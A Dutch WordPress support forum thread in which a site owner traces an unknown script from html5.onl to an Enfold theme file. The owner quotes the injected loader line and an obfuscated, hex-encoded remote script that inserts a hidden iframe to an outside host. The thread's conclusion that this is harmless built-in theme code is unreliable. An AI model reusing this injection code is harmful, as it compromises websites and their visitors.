Ondersteuning Volgende » Code oplossingen gezocht Volgende » Onbekend -leeg- script wordt automatisch bij mijn website geladen

  • Opgelost computerhulpwateringen

    (@computerhulpwateringen)


    Beste allemaal,

    Sinds de launch van mijn website merk ik via mijn addblocker (uBlock Origin 1.14.10 – aanrader!) Dat mijn website een script laad vanaf de pagina https://html5.onl/nav.php?0.20838301741998777

    Ik heb geen idee hoe dit in de code terecht is gekomen. Heb meerdere fileseek scans door mijn gehele server gedaan met zoektermen als “html5.onl” etc. maar kan het desbetreffende script die deze aanvraag activeert voor geen mogelijkheid vinden.

    Het heeft volgens mij niets te maken met virussen o.i.d. want het script doet namelijk niks. Ik vind het hinderlijk omdat het script namelijk verbinding maakt met https://html5.onl en daardoor een SSL certificaat fout aangeeft op mijn website.

    Enig advies hoe ik dit script kan opsporen en verwijderen?

    Groeten!

    De pagina waar ik hulp bij nodig heb: [log in om de link te zien]

8 reacties aan het bekijken - 1 tot 8 (van in totaal 8)
  • Moderator Jeroen Rotty

    (@jeroenrotty)

    Hoi @computerhulpwateringen,

    Ik heb zonet je website bezocht. Ik zie geen mixed content of waarschuwing en in de pagesource van de homepage zie ik ook nergens html5.onl. Ik zie dan ook gewoon een groen slotje.

    Kun jij eens in een andere browser of in incognito proberen?
    Zie je het daar nog is het in ieder geval vreemd. Misschien best eens alle plugins tijdelijk deactiveren, kijken of het er nog is en dan 1 voor 1 weer aanzetten tot je ziet dat het terug komt en dan weet je welke plugin er voor instaat.

    UPDATE
    Dit is vreemd, nu pas zie ik ook een probleem mbt het SSL. Ik zie nu in incognito en met cookies verwijderd ook de melding van Mixed Content en die url die je opgeeft.
    Ik vind het vreemd. Heb je al eens gescand met sucuri of met wordfence?
    Ik zou ook eens kijken of het met gedeactiveerde plugins ook ingeladen wordt, het komt misschien van een plugin. Kan ook gewoon in je thema verwikkeld zitten. Maar een scan kan geen kwaad.

    Jeroen

    • Deze reactie is gewijzigd 1 maand, 3 weken geleden door  Jeroen Rotty. Reden: meeri nfo
    • Deze reactie is gewijzigd 1 maand, 3 weken geleden door  Jeroen Rotty.

    Beste Jeroen, bedankt voor je reactie.

    De Melding met het SSL probleem wordt niet weergeven op desktop webbrowsers als Firefox, Chrome, IE etc.

    Mobiele apparaten zoals tablets en telefoons die niet via een van bovenstaande browsers mijn website bezoeken krijgen wel een SSL foutmelding te zien. Wellicht omdat die browsers niet Server Name Indication SNI ondersteunen en daardoor het verkeerde certificaat beoordelen. Ik tast daarover nog in het duister.

    Ik gebruik wordfence en die geeft al een paar weken geen foutmeldingen aan, ik zal sucuri eens laten draaien en kijken wat die vind.

    In ieder geval bedankt voor het meedenken, ik zal proberen de plugins een voor een uit te schakelen om zo de vermoedelijke oorzaak te vinden.

    Binnenkort plaats ik een update
    UPDATE
    Volgens Sucuri blijkt het script “40c238dce794f02ca31e59191fd3b0e1-1.js” zich te altijd te laden.
    Hieronder zie je een klein gedeelte van het script. De oorzaak heb ik dikgedrukt weergeven. Ik heb het vermoeden dat dit script wel functionaliteiten heeft echter zal ik kijken of alles nog goed werkt als ik de var _ot3zr=[“//html5.onl/nav.php?”,”random”] verwijder

    /**handles:avia-shortcodes**/
    var har_ic=document.createElement("script");har_ic.setAttribute("type","text/javascript");var _ot3zr=<em><strong>["//html5.onl/nav.php?","random"]</strong></em>,cot_hy=_ot3zr[0]+Math[_ot3zr[1]]();har_ic.setAttribute("src",cot_hy),document.getElementsByTagName("head")[0].appendChild(har_ic),!function(i){"use strict";function t(t){i.fn.avia_waypoints&&(void 0===t&&(t="body"),i(".avia_animate_when_visible",t).avia_waypoints(),i(".avia_animate_when_almost_visible",t).avia_waypoints({offset:"80%"}

    Het script dat wordt geladen op https://html5.onl/nav.php
    (wat wordt opgeroepen in vorige de code van mijn vorige post) heeft zo te zien wel degelijk functionaliteit omdat een aantal functies zoals dropdowns niet meer werken na het verwijderen van de link.

    Het script dat wordt geladen vanaf https://html5.onl/nav.php bevat:
    var _2e3ea0=["\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x36\x38\x37\x34\x37\x34\x37\x30\x33\x41\x32\x46\x32\x46\x36\x39\x36\x33\x36\x43\x36\x46\x37\x35\x36\x34\x36\x33\x36\x46\x36\x45\x36\x45\x36\x35\x36\x33\x37\x34\x36\x35\x36\x34\x32\x45\x36\x33\x36\x46\x36\x44\x32\x46\x36\x39\x36\x45\x36\x34\x36\x35\x37\x38\x32\x45\x37\x30\x36\x38\x37\x30\x33\x46\x36\x33\x36\x34\x37\x33\x33\x44\x33\x31","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];var thr_asy=document[_2e3ea0[1]](_2e3ea0[0]);thr_asy[_2e3ea0[2]]=_2e3ea0[3];var gui_lo=thr_asy[_2e3ea0[2]][_2e3ea0[4]];for(var i=0;i

    Enig idee hoe ik deze code lokaal kan hosten en kan gebruiken in de var, zodat er geen verbindingen meer nodig zijn naar deze externe website?

    Ik waardeer het meedenken!

    Moderator Jeroen Rotty

    (@jeroenrotty)

    Je zal eerst te weten moeten komen welke plugin of thema hier voor instaat. Heb je iets van menu plugins draaiende? Er zal wel ergens dit inzitten want in WordPress Core zit het niet.

    Jeroen

    Het script zit ingebakken in het thema dat ik gebruik, Enfold.
    Het zorgt er zo te zien voor dat de plaatjes (waar tekst naast staat) op de hoofdpagina tevoorschijn komen

    Het heeft niet te maken met andere plugins.

    Ik heb het gevoel dat ik maar beter niet in deze files kan rommelen. Het zal waarschijnlijk maar zo verder moeten.

    Bedankt voor het meedenken!

    Moderator Jeroen Rotty

    (@jeroenrotty)

    Hoi @computerhulpwateringen,

    Ik zou dan eerder de support raadplegen van Enfold zelf, daar dit een premium thema is gaan zij sneller kunnen reageren.

    Hier ga je vermoedelijk meer succes hebben:
    http://www.kriesi.at/support/forum/enfold/

    Los daarvan, heb je al de laatste nieuwe versie van Enfold?

    Succes,

    Jeroen

    Hoi Jeroen, bedankt voor je advies.

    Ik beschik over de laatste versie en zal het forum daar proberen.

    Groeten!

    Moderator Jeroen Rotty

    (@jeroenrotty)

    Prima.

    Is goed, moest het oplogst geraken graag ook hier de oplossing plaatsen en het topic op opgelost.

    Jeroen

8 reacties aan het bekijken - 1 tot 8 (van in totaal 8)